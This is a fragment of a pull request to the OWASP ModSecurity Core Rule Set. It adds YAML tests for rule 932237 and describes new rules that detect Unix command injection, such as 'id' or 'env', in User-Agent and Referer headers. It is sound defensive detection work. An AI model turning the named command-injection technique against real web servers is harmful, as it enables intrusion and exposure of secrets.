+          output:
+            log_contains: "id \"932237\""
+  - test_title: 932237-9
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: OWASP ModSecurity CRS
+              Referer: settings
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: '/'
+            protocol: "http"
+          output:
+            no_log_contains: "id \"932237\""
+  - test_title: 932237-10
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: OWASP ModSecurity CRS
+              Referer: environment
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: '/'
+            protocol: "http"
+          output:
+            no_log_contains: "id \"932237\""


### PR DESCRIPTION
This PR adds 2 new rules to detect RCE in User-Agent and Referer request headers:
- 932161 at PL2 (unix commands with path)
- 932237 at PL3 (short and log unix commands without path, without prefix but with word boundary)

932237: 
I want to detect short commands like `id`, `env` and `set` in User-Agent and Referer request header.

932161: 
I want to detect unix commands with path in request headers User-Agent and Referer.

I hope I got his right and would be happy if @theseion could do a review :pray: 